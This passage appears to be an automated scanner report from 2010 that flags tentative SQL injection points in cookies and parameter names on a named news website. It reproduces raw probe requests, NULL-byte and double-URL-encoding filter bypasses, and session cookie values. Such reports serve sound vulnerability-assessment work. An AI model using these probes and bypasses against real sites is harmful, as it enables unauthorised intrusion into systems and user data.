1.181. http://www.mercurynews.com/california-high-speed-rail/ci_16793216 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/california-high-speed-rail/ci_16793216
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /california-high-speed-rail/ci_16793216?1%00'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='San Jose City Council will hear update on high-rise bridge, but critics still want tunnel o ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /california-high-speed-rail/ci_16793216?1%00''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/california-high-spee ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Zvents cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%2527; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LONDON—Supermodel Naomi Campbell has been awarded a prize by the British Fashion Coun ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%2527%2527; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/celebrities/ci_16800030?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:47 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LONDON—Supermodel Naomi Campbell has been awarded a prize by the British Fashion Coun ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/celebrities/ci_16800030?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:40 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true'; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LONDON—Supermodel Naomi Campbell has been awarded a prize by the British Fashion Coun ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true''; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/celebrities/ci_16800030?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:37 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16761580 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Whether you celebrate Hanukkah, Kwanzaa or Christmas, or maybe all three, here are some gif ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <a href="http://www.insidebayarea.com/holdays-2009/ci_13866290" target="_blank" style="width:184px">From luxury on the cheap to can't-fail video games</a> ...[SNIP]...
Request 2
GET /ci_16761580 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/ci_16761580?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:38:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:38:32 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 434
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ci_16791927 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA%00'; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA%00''; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/ci_16791927?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:21 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 434
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16791927?source=m ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16791927?source=m ...[SNIP]...
1.189. http://www.mercurynews.com/ci_16791927 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/ci_16791927
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
